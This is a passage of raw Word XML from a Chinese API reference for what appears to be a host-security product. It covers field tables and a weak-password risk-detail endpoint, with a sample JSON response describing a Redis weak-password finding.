              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3009B882" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FF814EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B48207D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4D9D74EE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="044183B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6066EBA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="676A6BC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78B4DD5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6CEE4F9E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C9BAC33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B29DCEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="400D0CA5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FAAF7B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4322D35A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D715152" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F496013" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CF795F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5140EF22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7929E4AF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A130208" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3641BAAF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12A393E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="286D0372" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7AB2C550" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5736F739" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72B7240A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76EE87C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37DB7F63" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7C73BAB3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="374891CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="760DB272" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0683A4DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0358B065" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否匹配白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7ECE6514" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="查询风险详情-2"/>
      <w:bookmarkEnd w:id="104"/>
      <w:r>
        <w:t>查询风险详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F089A70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1819A35D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GET /external/api/vul/weakpwd/{linux|win}/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9CF71C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C0BC38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1701A263" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BF74FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/vul/weakpwd/linux/5b1edbed7d761b59ad1e7787</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF75976" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2FD803" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "vulId": "QT052016001395",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "vulName": "Redis服务存在弱密码",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "apps": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "Redis"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "desc": "Redis配置文件中requirepass配置项为访问口令，如果配置弱口令，攻击者可通过字典快速破解该口令。攻击者连接到Redis可获取敏感信息，并根据Redis权限对服务器进行操作。如果为弱口令，攻击者可快速获取Redis访问权限，并且管理员有一定几率不会发现该爆破过程。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "restartOpts": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "publicDate": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "app": "Redis",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "uname": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "accountStatus": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "weakType": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "version": "3.0.6",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "binPath": "/usr/bin/redis-server",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "password": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "unChangePwdDays": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "accountLoginType":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "interactiveLoginType": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "pwdStatus": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "firstCheckTime":"2016-12-02 00:00:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "bindIp":"127.0.0.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "port":6382,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "pid":111,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remote":false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "root":false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "loginShell":1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297EC442"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2199"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5329"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1C82B32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F3BD14B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34D928BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09FC326D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B2744AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6511D966" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D20E219" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="518EB29F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A6759EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19F19C9C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险id（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="62E5A76F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78CDF7E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10ABDDDE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C6B40D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29A2BAD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险名（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1B96B158" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F55406B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2494FC59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02A1B402" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="108363C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>影响的应用（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="07C24093" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F1E395C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>restartOpts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="458B67B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1015F973" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="360F65D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>重启选项：0-未知；1-无需重启；2-服务重启；3系统重启 （仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6F4165D6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4233F09D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>publicDate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DA28D20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="400CF983" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CCCFE37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>发布时间（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A8C4F9C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AECA520" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23878322" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20BE8645" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4831D384" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>弱密码应用（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5804356C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33D6F9A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5934374F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="433AC204" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4031F802" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E0E7AA8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34826220" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>accountStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08FB4310" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A4883B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AF1170F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>账号状态：对于windows：0-正常；1-锁定；2-禁用；对</w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>于linux主机：0-禁用；1-正常）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1C642C90" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C846190" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>weakType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D9FA5AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
